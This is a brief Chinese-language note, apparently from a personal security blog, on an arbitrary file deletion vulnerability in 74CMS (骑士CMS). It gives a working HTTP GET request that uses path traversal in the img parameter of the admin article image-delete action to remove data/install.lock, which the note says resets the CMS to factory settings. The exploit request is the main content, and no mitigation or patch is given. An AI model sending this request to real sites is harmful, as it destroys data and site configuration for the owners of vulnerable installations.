【笔记】骑士CMS的任意文件删除漏洞

前言

骑士CMS(74CMS)的任意文件删除漏洞

前提条件

  • 后台管理员为已登录状态

正文

/data/install.lock:骑士CMS中的install.lock文件被删除后,骑士CMS会恢复出厂设置

request
1
2
GET /admin/admin_article.php?act=del_img&img=../../data/install.lock
Referer: http://example.com/admin

完成

参考文献

哔哩哔哩——xiaodisec